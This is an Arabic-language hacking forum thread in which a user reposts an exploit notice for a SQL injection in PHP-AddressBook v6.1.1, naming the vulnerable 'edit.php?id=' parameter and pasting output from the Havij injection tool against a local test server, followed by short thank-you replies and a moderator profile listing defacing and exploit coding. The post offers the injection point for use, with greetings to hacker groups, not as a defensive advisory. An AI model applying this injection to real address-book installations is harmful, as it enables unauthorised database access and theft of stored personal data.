حالة الموضوع:
مغلق
  1. Ubuntu

    Ubuntu Developer

    الأنتساب:
    ‏6 يناير 2013
    المشاركات:
    62
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله تعالى وبركاته


    ثغرة sql

    كود PHP:
     site/path/edit.php?id=

    كود PHP:
    X-------------------------------------------------------------X
     _____ _   _ _   _ _____ _____ _____  ___   _   _   _______   _______ ___________ 
    |_   _| | | | \ | |_   _/  ___|_   _|/ \ | \ | | /  __ \ \ / / ___ \  ______ \
      | | | | | |  \| | | | \ `
    --.  | | / /_\ \|  \| | | /  \/\ V /| |_/ / |__ | |_/ /
      | | | | | | . 
    ` | | |  `--. \ | | |  _  || . ` | | |     \ / | ___ \  __||    / 
      | | | |
    _| | |\  |_| |_/\__/ /_| |_| | | || |\  | | \__/\ | | | |_/ / |___| |\ \ 
      \
    _/  \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/  \____/ \_/ \____/\____/\_| \_|
    X-------------------------------------------------------------X                                                                                  
     
     
    ***91;+***93AuthorTUNISIAN CYBER
    ***91;+***93Exploit Title:  PHP-AddressBook v6.1.1 (edit.phpSQL Injection Vulnerability
    ***91;+***93Date8-12-2013
    ***91;+***93Vendor:aguestbook.sourceforge.net/
    ***
    91;+***93CategoryWebApp
    ***91;+***93Google Dorkn/a
    ***91;+***93Tested onWin7 ubuntu 13.04
     
     
    ########################################################################################
    Exploit:
    127/PATH/edit.php?id=***91;SQL***93;

    Localtest:http://oi44.tinypic.com/b4t37n.jpg
    ---------------------------
    Havij Result:
    Host IP127.0.0.1
    Web Server
    Apache/2.2.8 (Win32PHP/5.2.6
    Powered
    -byPHP/5.2.6
    Keyword Found
    Smith
    I guess injection type is Integer
    ?! If injection failedretry with a manual keyword.
    DB ServerMySQL
    Selected Column Count is 25
    Valid String Column is 2
    Current DB
    address



    ./3nD
    ########################################################################################
    Greets toXMaXtnN43il HacK3rXtechSEt

     
  2. rachi-dz

    rachi-dz Developer

    الأنتساب:
    ‏6 يونيو 2012
    المشاركات:
    57
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الوظيفة:
    طالب
    الإقامة:
    القيسة كدد
    رد: PHP-AddressBook v6.1.1 (edit.php) SQL Injection Vulnerability

    تِسلَـمْ أخِي
    بَاركـَ الله فِيكَ
     
  3. M3N X

    M3N X Developer

    الأنتساب:
    ‏16 يوليو 2013
    المشاركات:
    97
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    رد: PHP-AddressBook v6.1.1 (edit.php) SQL Injection Vulnerability

    يعطيك العافيه موضوع رائع
    تم تقيمك !:"
     
  4. NETJOURNAL

    NETJOURNAL مشرف

    الأنتساب:
    ‏18 مايو 2006
    المشاركات:
    676
    الإعجابات المتلقاة:
    1,543
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    رد: PHP-AddressBook v6.1.1 (edit.php) SQL Injection Vulnerability

    ^:"^:"^:"^:"^:"
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة